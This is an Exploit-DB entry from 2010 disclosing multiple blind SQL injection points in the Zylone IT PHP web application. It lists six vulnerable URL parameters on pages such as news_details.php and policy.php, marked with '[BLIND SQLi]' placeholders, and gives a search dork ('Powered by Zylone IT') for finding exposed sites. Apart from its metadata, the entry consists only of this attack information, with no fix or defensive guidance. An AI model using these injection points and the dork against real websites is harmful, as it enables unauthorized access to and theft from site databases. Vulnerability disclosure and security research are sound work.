Zylone IT Multiple Blind SQL Injection Vulnerability

2010-07-08T00:00:00
ID EDB-ID:14270
Type exploitdb
Reporter Callo
Modified 2010-07-08T00:00:00

Description

Zylone IT Multiple Blind SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            # Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php

10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknow
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101